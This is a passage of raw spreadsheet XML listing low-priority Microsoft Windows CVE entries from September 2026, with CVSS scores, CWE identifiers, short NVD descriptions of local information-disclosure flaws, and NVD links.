t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68886</t></is></c></row><row r="1249"><c r="A1249" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1249" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1249" s="5" t="inlineStr"><is><t>CVE-2026-68895</t></is></c><c r="D1249" s="5" t="n"><v>5.5</v></c><c r="E1249" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1249" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1249" s="5" t="inlineStr" /><c r="H1249" s="5" t="n"><v>0.003</v></c><c r="I1249" s="5" t="inlineStr" /><c r="J1249" s="5" t="inlineStr" /><c r="K1249" s="5" t="inlineStr" /><c r="L1249" s="5" t="inlineStr" /><c r="M1249" s="5" t="inlineStr" /><c r="N1249" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1249" s="5" t="inlineStr" /><c r="R1249" s="5" t="inlineStr"><is><t>CWE-197</t></is></c><c r="S1249" s="5" t="inlineStr"><is><t>Numeric truncation error in Internet Storage Name Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1249" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68895</t></is></c></row><row r="1250"><c r="A1250" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1250" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1250" s="5" t="inlineStr"><is><t>CVE-2026-69286</t></is></c><c r="D1250" s="5" t="n"><v>5.5</v></c><c r="E1250" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1250" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1250" s="5" t="inlineStr" /><c r="H1250" s="5" t="n"><v>0.004</v></c><c r="I1250" s="5" t="inlineStr" /><c r="J1250" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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0" s="5" t="inlineStr" /><c r="M1250" s="5" t="inlineStr" /><c r="N1250" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1250" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1250" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1250" s="5" t="inlineStr" /><c r="R1250" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S1250" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to disclose information locally.</t></is></c><c r="T1250" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69286</t></is></c></row><row r="1251"><c r="A1251" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1251" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1251" s="5" t="inlineStr"><is><t>CVE-2026-69288</t></is></c><c r="D1251" s="5" t="n"><v>5.5</v></c><c r="E1251" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1251" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1251" s="5" t="inlineStr" /><c r="H1251" s="5" t="n"><v>0.003</v></c><c r="I1251" s="5" t="inlineStr" /><c r="J1251" s="5" t="inlineStr" /><c r="K1251" s="5" t="inlineStr" /><c r="L1251" s="5" t="inlineStr" /><c r="M1251" s="5" t="inlineStr" /><c r="N1251" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1251" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1251" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1251" s="5" t="inlineStr" /><c r="R1251" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1251" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows GDI+ allows an authorized attacker to disclose information locally.</t></is></c><c r="T1251" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69288</t></is></c></row><row r="1252"><c r="A1252" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1252" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1252" s="5" t="inlineStr"><is><t>CVE-2026-69294</t></is></c><c r="D1252" s="5" t="n"><v>5.5</v></c><c r="E1252" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1252" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1252" s="5" t="inlineStr" /><c r="H1252" s="5" t="n"><v>0.003</v></c><c r="I1252" s="5" t="inlineStr" /><c r="J1252" s="5" t="inlineStr" /><c r="K1252" s="5" t="inlineStr" /><c r="L1252" s="5" t="inlineStr" /><c r="M1252" s="5" t="inlineStr" /><c r="N1252" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1252" s="5" t="inlineStr" /><c r="R1252" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1252" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Microsoft COM for Windows allows an authorized attacker to disclose information locally.</t></is></c><c r="T1252" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69294</t></is></c></row><row r="1253"><c r="A1253" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1253" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1253" s="5" t="inlineStr"><is><t>CVE-2026-69303</t></is></c><c r="D1253" s="5" t="n"><v>5.5</v></c><c r="E1253" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1253" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1253" s="5" t="inlineStr" /><c r="H1253" s="5" t="n"><v>0.004</v></c><c r="I1253" s="5" t="inlineStr" /><c r="J1253" s="5" t="inlineStr" /><c r="K1253" s="5" t="inlineStr" /><c r="L1253" s="5" t="inlineStr" /><c r="M1253" s="5" t="inlineStr" /><c r="N1253" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1253" s="5" t="inlineStr" /><c r="R1253" s="5" t="inlineStr"><is><t>CWE-125, CWE-191</t></is></c><c r="S1253" s="5" t="inlineStr"><is><t>Out-of-bounds read in Push Message Routing Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1253" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69303</t></is></c></row><row r="1254"><c r="A1254" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1254" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1254" s="5" t="inlineStr"><is><t>CVE-2026-69308</t></is></c><c r="D1254" s="5" t="n"><v>5.5</v></c><c r="E1254" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1254" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1254" s="5" t="inlineStr" /><c r="H1254" s="5" t="n"><v>0.004</v></c><c r="I1254" s="5" t="inlineStr" /><c r="J1254" s="5" t="inlineStr" /><c r="K1254" s="5" t="inlineStr" /><c r="L1254" s="5" t="inlineStr" /><c r="M1254" s="5" t="inlineStr" /><c r="N1254" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1254" s="5" t="inlineStr" /><c r="R1254" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S1254" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1254" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69308</t></is></c></row><row r="1255"><c r="A1255" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1255" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1255" s="5" t="inlineStr"><is><t>CVE-2026-69315</t></is></c><c r="D1255" s="5" t="n"><v>5.5</v></c><c r="E1255" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1255" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1255" s="5" t="inlineStr" /><c r="H1255" s="5" t="n"><v>0.005</v></c><c r="I1255" s="5" t="inlineStr" /><c r="J1255" s="5" t="inlineStr" /><c r="K1255" s="5" t="inlineStr" /><c r="L1255" s="5" t="inlineStr" /><c r="M1255" s="5" t="inlineStr" /><c r="N1255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1255" s="5" t="inlineStr" /><c r="R1255" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1255" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows License Manager allows an authorized attacker to disclose information locally.</t></is></c><c r="T1255" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69315</t></is></c></row><row r="1256"><c r="A1256" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1256" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1256" s="5" t="inlineStr"><is><t>CVE-2026-69318</t></is></c><c r="D1256" s="5" t="n"><v>5.5</v></c><c r="E1256" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1256" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1256" s="5" t="inlineStr" /><c r="H1256" s="5" t="n"><v>0.004</v></c><c r="I1256" s="5" t="inlineStr" /><c r="J1256" s="5" t="inlineStr" /><c r="K1256" s="5" t="inlineStr" /><c r="L1256" s="5" t="inlineStr" /><c r="M1256" s="5" t="inlineStr" /><c r="N1256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1256" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1256" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1256" s="5" t="inlineStr" /><c r="R1256" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1256" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Imaging Component allows an authorized attacker to disclose information locally.</t></is></c><c r="T1256" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69318</t></is></c></row><row r="1257"><c r="A1257" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1257" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1257" s="5" t="inlineStr"><is><t>CVE-2026-69321</t></is></c><c r="D1257" s="5" t="n"><v>5.5</v></c><c r="E1257" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1257" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1257" s="5" t="inlineStr" /><c r="H1257" s="5" t="n"><v>0.003</v></c><c r="I1257" s="5" t="inlineStr" /><c r="J1257" s="5" t="inlineStr" /><c r="K1257" s="5" t="inlineStr" /><c r="L1257" s="5" t="inlineStr" /><c r="M1257" s="5" t="inlineStr" /><c r="N1257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1257" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1257" s="5" t="inlineStr" /><c r="R1257" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1257" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Power Dependency Coordinator allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1257" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69321</t></is></c></row><row r="1258"><c r="A1258" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1258" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1258" s="5" t="inlineStr"><is><t>CVE-2026-69339</t></is></c><c r="D1258" s="5" t="n"><v>5.5</v></c><c r="E1258" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1258" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1258" s="5" t="inlineStr" /><c r="H1258" s="5" t="n"><v>0.005</v></c><c r="I1258" s="5" t="inlineStr" /><c r="J1258" s="5" t="inlineStr" /><c r="K1258" s="5" t="inlineStr" /><c r="L1258" s="5" t="inlineStr" /><c r="M1258" s="5" t="inlineStr" /><c r="N1258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1258" s="5" t="inlineStr" /><c r="R1258" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1258" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t></is></c><c r="T1258" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69339</t></is></c></row><row r="1259"><c r="A1259" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1259" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1259" s="5" t="inlineStr"><is><t>CVE-2026-69343</t></is></c><c r="D1259" s="5" t="n"><v>5.5</v></c><c r="E1259" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1259" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1259" s="5" t="inlineStr" /><c r="H1259" s="5" t="n"><v>0.004</v></c><c r="I1259" s="5" t="inlineStr" /><c r="J1259" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K125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9" s="5" t="inlineStr" /><c r="M1259" s="5" t="inlineStr" /><c r="N1259" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1259" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1259" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1259" s="5" t="inlineStr" /><c r="R1259" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1259" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t></is></c><c r="T1259" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69343</t></is></c></row><row r="1260"><c r="A1260" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1260" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1260" s="5" t="inlineStr"><is><t>CVE-2026-69344</t></is></c><c r="D1260" s="5" t="n"><v>5.5</v></c><c r="E1260" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1260" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1260" s="5" t="inlineStr" /><c r="H1260" s="5" t="n"><v>0.004</v></c><c r="I1260" s="5" t="inlineStr" /><c r="J1260" s="5" t="inlineStr" /><c r="K1260" s="5" t="inlineStr" /><c r="L1260" s="5" t="inlineStr" /><c r="M1260" s="5" t="inlineStr" /><c r="N1260" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1260" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1260" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1260" s="5" t="inlineStr" /><c r="R1260" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1260" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Print Spooler Components allows an authorized attacker to disclose information locally.</t></is></c><c r="T1260" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69344</t></is></c></row><row r="1261"><c r="A1261" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1261" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1261" s="5" t="inlineStr"><is><t>CVE-2026-69345</t></is></c><c r="D1261" s="5" t="n"><v>5.5</v></c><c r="E1261" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1261" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1261" s="5" t="inlineStr" /><c r="H1261" s="5" t="n"><v>0.004</v></c><c r="I1261" s="5" t="inlineStr" /><c r="J1261" s="5" t="inlineStr" /><c r="K1261" s="5" t="inlineStr" /><c r="L1261" s="5" t="inlineStr" /><c r="M1261" s="5" t="inlineStr" /><c r="N1261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1261" s="5" t="inlineStr" /><c r="R1261" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1261" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1261" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69345</t></is></c></row><row r="1262"><c r="A1262" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1262" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1262" s="5" t="inlineStr"><is><t>CVE-2026-69351</t></is></c><c r="D1262" s="5" t="n"><v>5.5</v></c><c r="E1262" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1262" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1262" s="5" t="inlineStr" /><c r="H1262" s="5" t="n"><v>0.005</v></c><c r="I1262" s="5" t="inlineStr" /><c r="J1262" s="5" t="inlineStr" /><c r="K1262" s="5" t="inlineStr" /><c r="L1262" s="5" t="inlineStr" /><c r="M1262" s="5" t="inlineStr" /><c r="N1262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1262" s="5" t="inlineStr" /><c r="R1262" s="5" t="inlineStr"><is><t>CWE-359</t></is></c><c r="S1262" s="5" t="inlineStr"><is><t>Exposure of private personal information to an unauthorized actor in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t></is></c><c r="T1262" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69351</t></is></c></row><row r="1263"><c r="A1263" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1263" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1263" s="5" t="inlineStr"><is><t>CVE-2026-69353</t></is></c><c r="D1263" s="5" t="n"><v>5.5</v></c><c r="E1263" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1263" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1263" s="5" t="inlineStr" /><c r="H1263" s="5" t="n"><v>0.004</v></c><c r="I1263" s="5" t="inlineStr" /><c r="J1263" s="5" t="inlineStr" /><c r="K1263" s="5" t="inlineStr" /><c r="L1263" s="5" t="inlineStr" /><c r="M1263" s="5" t="inlineStr" /><c r="N1263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1263" s="5" t="inlineStr" /><c r="R1263" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1263" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Text Shaping allows an authorized attacker to disclose information locally.</t></is></c><c r="T1263" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69353</t></is></c></row><row r="1264"><c r="A1264" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1264" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1264" s="5" t="inlineStr"><is><t>CVE-2026-69367</t></is></c><c r="D1264" s="5" t="n"><v>5.5</v></c><c r="E1264" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1264" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1264" s="5" t="inlineStr" /><c r="H1264" s="5" t="n"><v>0.004</v></c><c r="I1264" s="5" t="inlineStr" /><c r="J1264" s="5" t="inlineStr" /><c r="K1264" s="5" t="inlineStr" /><c r="L1264" s="5" t="inlineStr" /><c r="M1264" s="5" t="inlineStr" /><c r="N1264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1264" s="5" t="inlineStr" /><c r="R1264" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1264" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1264" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69367</t></is></c></row><row r="1265"><c r="A1265" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1265" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1265" s="5" t="inlineStr"><is><t>CVE-2026-69369</t></is></c><c r="D1265" s="5" t="n"><v>5.5</v></c><c r="E1265" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1265" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1265" s="5" t="inlineStr" /><c r="H1265" s="5" t="n"><v>0.003</v></c><c r="I1265" s="5" t="inlineStr" /><c r="J1265" s="5" t="inlineStr" /><c r="K1265" s="5" t="inlineStr" /><c r="L1265" s="5" t="inlineStr" /><c r="M1265" s="5" t="inlineStr" /><c r="N1265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1265" s="5" t="inlineStr" /><c r="R1265" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1265" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DNS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1265" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69369</t></is></c></row><row r="1266"><c r="A1266" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1266" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1266" s="5" t="inlineStr"><is><t>CVE-2026-69376</t></is></c><c r="D1266" s="5" t="n"><v>5.5</v></c><c r="E1266" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1266" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1266" s="5" t="inlineStr" /><c r="H1266" s="5" t="n"><v>0.004</v></c><c r="I1266" s="5" t="inlineStr" /><c r="J1266" s="5" t="inlineStr" /><c r="K1266" s="5" t="inlineStr" /><c r="L1266" s="5" t="inlineStr" /><c r="M1266" s="5" t="inlineStr" /><c r="N1266" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1266" s="5" t="inlineStr" /><c r="R1266" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1266" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1266" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69376</t></is></c></row><row r="1267"><c r="A1267" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1267" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1267" s="5" t="inlineStr"><is><t>CVE-2026-69390</t></is></c><c r="D1267" s="5" t="n"><v>5.5</v></c><c r="E1267" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1267" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1267" s="5" t="inlineStr" /><c r="H1267" s="5" t="n"><v>0.004</v></c><c r="I1267" s="5" t="inlineStr" /><c r="J1267" s="5" t="inlineStr" /><c r="K1267" s="5" t="inlineStr" /><c r="L1267" s="5" t="inlineStr" /><c r="M1267" s="5" t="inlineStr" /><c r="N1267" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1267" s="5" t="inlineStr" /><c r="R1267" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1267" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1267" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69390</t></is></c></row><row r="1268"><c r="A1268" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1268" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1268" s="5" t="inlineStr"><is><t>CVE-2026-69403</t></is></c><c r="D1268" s="5" t="n"><v>5.5</v></c><c r="E1268" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1268" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1268" s="5" t="inlineStr" /><c r="H1268" s="5" t="n"><v>0.003</v></c><c r="I1268" s="5" t="inlineStr" /><c r="J1268" s="5" t="inlineStr" /><c r="K1268" s="5" t="inlineStr" /><c r="L1268" s="5" t="inlineStr" /><c r="M1268" s="5" t="inlineStr" /><c r="N1268" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1268" s="5" t="inlineStr" /><c r="R1268" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1268" s="5" t="inlineStr"><is><t>Missing authorization in Windows SMB Server allows an authorized attacker to disclose information locally.</t></is></c><c r="T1268" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69403</t></is></c></row><row r="1269"><c r="A1269" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1269" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1269" s="5" t="inlineStr"><is><t>CVE-2026-69406</t></is></c><c r="D1269" s="5" t="n"><v>5.5</v></c><c r="E1269" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1269" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1269" s="5" t="inlineStr" /><c r="H1269" s="5" t="n"><v>0.005</v></c><c r="I1269" s="5" t="inlineStr" /><c r="J1269" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K126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69" s="5" t="inlineStr" /><c r="M1269" s="5" t="inlineStr" /><c r="N1269" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1269" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1269" s="5" t="inlineStr" /><c r="R1269" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1269" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information locally.</t></is></c><c r="T1269" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69406</t></is></c></row><row r="1270"><c r="A1270" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1270" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1270" s="5" t="inlineStr"><is><t>CVE-2026-69453</t></is></c><c r="D1270" s="5" t="n"><v>5.5</v></c><c r="E1270" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1270" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1270" s="5" t="inlineStr" /><c r="H1270" s="5" t="n"><v>0.003</v></c><c r="I1270" s="5" t="inlineStr" /><c r="J1270" s="5" t="inlineStr" /><c r="K1270" s="5" t="inlineStr" /><c r="L1270" s="5" t="inlineStr" /><c r="M1270" s="5" t="inlineStr" /><c r="N1270" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1270" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1270" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1270" s="5" t="inlineStr" /><c r="R1270" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1270" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1270" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69453</t></is></c></row><row r="1271"><c r="A1271" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1271" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1271" s="5" 